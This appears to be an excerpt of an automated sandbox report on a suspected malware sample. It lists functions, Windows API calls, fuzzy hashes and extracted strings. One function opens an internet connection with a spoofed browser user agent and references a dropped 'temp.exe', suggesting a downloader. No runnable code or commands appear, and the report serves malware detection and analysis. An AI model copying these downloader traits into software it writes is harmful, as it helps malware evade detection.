                                                                                                                                                                                            • Instruction Fuzzy Hash: 3751F472921226FFEB299F94F441BBA73A8FF04310F148129E905572A1D732ED78DB50
                                                                                                                                                                                            Function 002324E7 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a67a077e91174a3484064c1fdb98f9f4c361c58070288016addf1fba428194c6
                                                                                                                                                                                            • Instruction ID: d2581172bda22e08134006d7e4c430a4d7be50592c50cfa458c2f9f52f6aa1ed
                                                                                                                                                                                            • Opcode Fuzzy Hash: a67a077e91174a3484064c1fdb98f9f4c361c58070288016addf1fba428194c6
                                                                                                                                                                                            • Instruction Fuzzy Hash: E641FBF2A20304FFD7189F78DC42B5EBBE8EB88710F10452AF411DB291D371AA648B80
                                                                                                                                                                                            Function 00235528 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0023558C
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00235593
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 002355CD
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 002355D4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                            • Opcode ID: 3b48abbe099dbf6e61f342c1de1d7cd417183d79b9c2dd3db9c0bcf1761b08ea
                                                                                                                                                                                            • Instruction ID: 70d014d6af16b309a74913ea388d3b62873b9ab0e2d5c0d3e740364bd172cfc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b48abbe099dbf6e61f342c1de1d7cd417183d79b9c2dd3db9c0bcf1761b08ea
                                                                                                                                                                                            • Instruction Fuzzy Hash: B221C5F1620A26BFDB20AF65D88596BB7AAFF14360B518528F81D97250D770FC208F90
                                                                                                                                                                                            Function 0023661F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00236627
                                                                                                                                                                                              • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023665F
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023667F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                            • Opcode ID: 10820fcfda1e31ef2f46fea716fdde4eea5e77cf1ea320c283e3ed6e1a948a4f
                                                                                                                                                                                            • Instruction ID: 4bf06061fdb47ddbfb256633b6c745df1cae414528f82a4f11ca58c28e62131c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 10820fcfda1e31ef2f46fea716fdde4eea5e77cf1ea320c283e3ed6e1a948a4f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6611C4F5931616BEAA112BB6AC8ECAF696CEE463D4B104128FC0192101EA75CD604EB5
                                                                                                                                                                                            Function 0020E0D4 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Func_class$H_prolog3
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3413606670-0
                                                                                                                                                                                            • Opcode ID: a7ec07360c5c5cad71c24db494fd1f22da418231d4eb2d5b5b7b709dca0a2ec6
                                                                                                                                                                                            • Instruction ID: 74003cf1057b5e183f2ac1d50efc358212d551ee9309e9f404e01fb2c545d451
                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ec07360c5c5cad71c24db494fd1f22da418231d4eb2d5b5b7b709dca0a2ec6
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2216D7091538CDFCF01DFA8C5946DCBBB4AF18300F6440A9E809A7282C7748A98CB95
                                                                                                                                                                                            Function 0023E437 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000), ref: 0023E44E
                                                                                                                                                                                            • GetLastError.KERNEL32(?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?,?,?,00230CCD,?), ref: 0023E45A
                                                                                                                                                                                              • Part of subcall function 0023E420: CloseHandle.KERNEL32(FFFFFFFE,0023E46A,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?,?), ref: 0023E430
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0023E46A
                                                                                                                                                                                              • Part of subcall function 0023E3D6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023E405,0023B28E,?,?,0023072A,?,00000000,00000000,?), ref: 0023E3E9
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?), ref: 0023E47F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: fe28f9a170b47199e68a8f1742668d6348f05df77e84cbf3a7cf84a2f45f4532
                                                                                                                                                                                            • Instruction ID: 3d7ea87d428e955267f34fa812b081615b529daefd8bea7c7990c6f2c265f38c
                                                                                                                                                                                            • Opcode Fuzzy Hash: fe28f9a170b47199e68a8f1742668d6348f05df77e84cbf3a7cf84a2f45f4532
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F0C03A510369BBCF222FD5EC0CA9A3F66FB4A7A1F054010FA1D95171DB328870DBA1
                                                                                                                                                                                            Function 00230BEB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00230338: GetConsoleOutputCP.KERNEL32(07CD655B,00000000,00000000,?), ref: 0023039B
                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,b:",00000000,?,00000000,?,?,00223A62,?,00000000,?,?,?,?), ref: 00230D70
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00223A62,?,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00230D7A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                            • String ID: b:"
                                                                                                                                                                                            • API String ID: 2915228174-1155226049
                                                                                                                                                                                            • Opcode ID: 021a70730da5f9a9a1d0bcb78cf84b638059a8e32b71d9813957f871ec02dc8b
                                                                                                                                                                                            • Instruction ID: 866dd2360df8cb881174338599ac422de498555892c33e13c85a4a495c331c45
                                                                                                                                                                                            • Opcode Fuzzy Hash: 021a70730da5f9a9a1d0bcb78cf84b638059a8e32b71d9813957f871ec02dc8b
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA6192B192025EAFDF11DFA8D8D5AEEBBB9EF09304F140546E904A7212D371D921CBA0
                                                                                                                                                                                            Function 00211263 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • iterator out of range, xrefs: 002112B0
                                                                                                                                                                                            • iterator does not fit current value, xrefs: 00211395
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                                            • String ID: iterator does not fit current value$iterator out of range
                                                                                                                                                                                            • API String ID: 2427045233-1046077056
                                                                                                                                                                                            • Opcode ID: b8a42af300a83923128b2a3d4f04dd8544d7b07a0d71983ae5927947315a08dd
                                                                                                                                                                                            • Instruction ID: 8441adb3f5552b22cf5e0d4f6bf3feb37a96f4900fd24ffdf85012c2d74ea252
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8a42af300a83923128b2a3d4f04dd8544d7b07a0d71983ae5927947315a08dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E41E131924309EFDB04EF60D492AEEB7B5AF15310F20409AFA11AB1D2DB705EA5CB91
                                                                                                                                                                                            Function 00222ADD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00222B02
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: 41f0108df23a6e0bca9da1a20f05ab60684b5859a3ce0e739e29735ce4d766ed
                                                                                                                                                                                            • Instruction ID: 8d9430f95f6f8b8c933d3e66a30f3d2df439002dd6812bbacb87ef1dba38f5cc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 41f0108df23a6e0bca9da1a20f05ab60684b5859a3ce0e739e29735ce4d766ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741797191021AFFCF16DF98E981AEEBBB5FF08304F148099F904A7221D3369A64DB50
                                                                                                                                                                                            Function 002176CE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002176D8
                                                                                                                                                                                              • Part of subcall function 002061C0: __EH_prolog3_GS.LIBCMT ref: 002061C7
                                                                                                                                                                                              • Part of subcall function 002061C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020E19F: __EH_prolog3.LIBCMT ref: 0020E1A6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • temp.exe, xrefs: 002177C7
                                                                                                                                                                                            • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 002176E4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3H_prolog3_$InternetOpen
                                                                                                                                                                                            • String ID: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$temp.exe
                                                                                                                                                                                            • API String ID: 2236497292-3505050493
                                                                                                                                                                                            • Opcode ID: ea2d35f3c908ac8ccea3e4c88234325743d56a9a1c30a720a4271273d1371da1
                                                                                                                                                                                            • Instruction ID: 4e858512a6b20d864f526fbd9a71ccc358bff61c564b714e7de9486cc1dacae7
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea2d35f3c908ac8ccea3e4c88234325743d56a9a1c30a720a4271273d1371da1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 48415A32D20348AAEB15EBB4C896BDDB775AF54300F5084A8E505B70D3EB745B68CF62
                                                                                                                                                                                            Function 0021C0F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • stoull argument out of range, xrefs: 0021C267
                                                                                                                                                                                            • invalid stoull argument, xrefs: 0021C25D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_catch_
                                                                                                                                                                                            • String ID: invalid stoull argument$stoull argument out of range
                                                                                                                                                                                            • API String ID: 1329019490-980025665
                                                                                                                                                                                            • Opcode ID: b6e6b5be88c597bede1058b01dd1657bac844d22bb19622281c3818e68641897
                                                                                                                                                                                            • Instruction ID: 5b03129049dd8ca274dd2d064d4e72b87589b8aed0c6fdc0cef2060746807c48
                                                                                                                                                                                            • Opcode Fuzzy Hash: b6e6b5be88c597bede1058b01dd1657bac844d22bb19622281c3818e68641897
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A412831D10258EFCB04DF98C881ADCBBF1BF64314F248259E815AB292D770AEA1CF54
                                                                                                                                                                                            Function 0020E5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                                            • String ID: H$value
                                                                                                                                                                                            • API String ID: 2427045233-2917141609
                                                                                                                                                                                            • Opcode ID: c1599c21ebfb09a655b261695c2869f150d4b943c7d2e3e4c35b696ff553f2ed
                                                                                                                                                                                            • Instruction ID: ab9b39806a02fcbdd982a1fdba15ea26e773eb09064c23d90ff0eb13f61a3973
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1599c21ebfb09a655b261695c2869f150d4b943c7d2e3e4c35b696ff553f2ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB3197B1D20248EEEB04DBA4C946BEEBBB4AF19314F5045A9E508A7183D7785F09CF12
                                                                                                                                                                                            Function 0020F10F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                                            • String ID: H$value
                                                                                                                                                                                            • API String ID: 2427045233-2917141609
                                                                                                                                                                                            • Opcode ID: 9539f7d417d5994ffe1253d011450999eb7b6370ce1ea2937ad87273996e0f6d
                                                                                                                                                                                            • Instruction ID: d549e9bcf30470e3a0efe4703af14d33ef3e9c4c5ed9279591cd0980844db996
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9539f7d417d5994ffe1253d011450999eb7b6370ce1ea2937ad87273996e0f6d
                                                                                                                                                                                            • Instruction Fuzzy Hash: B931A9B1D20348EEEB14DBA8C945BDDBBB4AF19310F5085A9E108B7282DB745A08CF21
                                                                                                                                                                                            Function 00205FB9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00205FC0
                                                                                                                                                                                              • Part of subcall function 00205D26: __EH_prolog3_GS.LIBCMT ref: 00205D2D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                            • String ID: at line $, column
                                                                                                                                                                                            • API String ID: 3355343447-191570568
                                                                                                                                                                                            • Opcode ID: bd810248da179a6972a6c52b49fe50656bd878aeac5fd9c578559a53332054dd
                                                                                                                                                                                            • Instruction ID: 20e7e0616913cc15300b05aabb1fd0d28234aacaa31cdf5bef247252e074345b
                                                                                                                                                                                            • Opcode Fuzzy Hash: bd810248da179a6972a6c52b49fe50656bd878aeac5fd9c578559a53332054dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C219D70E103059FDB48EF68D9567AEBBB1AF84300F54456AE115E73C2DBB45A10CF92
                                                                                                                                                                                            Function 002135AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002135B6
                                                                                                                                                                                              • Part of subcall function 00205EB3: __EH_prolog3.LIBCMT ref: 00205EBA
                                                                                                                                                                                              • Part of subcall function 0020E283: __EH_prolog3.LIBCMT ref: 0020E28A
                                                                                                                                                                                              • Part of subcall function 00205E6C: __EH_prolog3.LIBCMT ref: 00205E73
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3$H_prolog3_
                                                                                                                                                                                            • String ID: J $type_error
                                                                                                                                                                                            • API String ID: 4240126716-1852224253
                                                                                                                                                                                            • Opcode ID: 79f8b71534bfeda7b4377c7f158db850be5ef228c8239575b3e6fa2d488da768
                                                                                                                                                                                            • Instruction ID: 3887ef6187be6854a73a92f6ee541f500d75cd9394c1e09d488aeb8461ef26bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f8b71534bfeda7b4377c7f158db850be5ef228c8239575b3e6fa2d488da768
                                                                                                                                                                                            • Instruction Fuzzy Hash: 00218970C24348EADB04EBE8D895ADDBBB0BF15300F90815DE5446B2C2DBB41A58CB52
                                                                                                                                                                                            Function 00206543 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
